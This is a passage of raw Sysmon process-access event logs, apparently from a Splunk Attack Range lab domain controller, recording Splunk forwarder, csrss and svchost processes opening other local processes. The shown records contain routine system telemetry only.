AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:59:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5968,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:43.347\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-20EF-5F25-0000-001076480900}\r\nTargetProcessId: 4384\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:43.347","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-20EF-5F25-0000-001076480900}","TargetProcessId":"4384","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5969,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:43.347\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20EF-5F25-0000-001076480900}\r\nTargetProcessId: 4384\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:43.347","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20EF-5F25-0000-001076480900}","TargetProcessId":"4384","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5970,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:43.347\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:43.347","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5971,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:43.347\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:43.347","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5972,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:43.347\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:43.347","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5973,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:43.347\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:43.347","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5974,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:43.347\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:43.347","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5975,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:43.347\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:43.347","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
